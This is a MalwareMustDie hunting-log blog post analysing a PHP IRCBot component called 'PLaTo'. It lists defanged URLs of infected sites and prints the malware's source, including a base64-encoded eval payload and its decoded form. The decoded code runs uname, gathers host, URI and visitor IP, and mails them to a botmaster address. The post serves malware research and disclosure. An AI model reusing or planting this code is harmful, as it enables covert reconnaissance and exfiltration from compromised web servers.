MalwareMustDie!

Semper legerent Salve Regina ante venatione malware

© MalwareMustDie,NPO 2017. All rights reserved.
Built by Jekyll, based on Poole and BlackDoc on FreeBSD, posts are in Markdown and Rouge highlighter with templates coded in Liquid.

Hunting Log - PHP/RemoteAdmin

01 Sep 2012 

Just a quicky, no big deal about this, I wrote to my record & to share:

The below URLs are infected by the evil script called PlaTo is an PHP interface/IRCBot
According to filestamp infected between today to a month ago.
hxxp://jungilbooks.co.kr/gnuboard4/data/session/vero.txt
hxxp://www.ccieurolam.com/cms/vero.txt
hxxp://www.patriciasantoro.com.ar/help/css/vero.txt
hxxp://regi.foldgazvt.hu/vero.txt


You will see the below PHP code at it:
<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = " 4ON 6";
}
else {$safemode = false; $hsafemode = " 3OFF 6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"hxxp://".$OS."\">";
echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKE
BpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVs
c2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQU
REUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJh
biA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW
5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2Vi
LiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLi
RhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJrYW1laGFtZS5kcmFnb25A
Z21haWwuY29tIiwiU2V0b3JhbiBCb3MgIi4kc2FmZW1vZGUsJGJvZHksJGZsb2F0KTs="));
die("<center> ByroeNet </center>");


It's not even close to smart to encode with base64, just decode it to-
get the eval value below:
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
  $safemode = "ON";
}
else
{
  $safemode = "OFF";
}
$visitor = $_SERVER["REMOTE_ADDR"];
$float = "From : vurl info ";
$aran = exec('uname -a;');
$web = $_SERVER["hxxp_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = 
"Bug hxxp://".$web.$inj.
" nnSpread Via : ".$visitor.
"nnKernel Version : 
".$aran."nnSafe Mode: 
".$safemode;
mail("kamehame.dragon@gmail.com",
"Setoran Bos ".$safemode,$body,$float);


It is the part of IRC Bot, I bet you will get some more IRC/Bot script in the -
same directory of the infected URLs above.
I am not a linguistic expert, but judging by wording is made by 
Indonesian (90% possibility) or Malaysian language speaking moron.
These codes got in by a simple injection to the Web Server which strongly -
suspected having directory traversal & file upload arbitrary flaws.

As per written above, it sends mail to the botmaster kamehame.dragon@gmail.com &
Sending the OS, Kernel info & path of infected urls.
Just checked it in Virus Total with the below detection:
MD5:             ee957307ca0b286a464260a912bfa1b7
File size:       1.2 KB ( 1193 bytes )
File name:       vero.txt
File type:       PHP
Detection ratio: 28 / 42
Analysis date:   2012-09-01 07:11:35 UTC ( 3 分 ago ) 
URL:             [HERE]

Recent Posts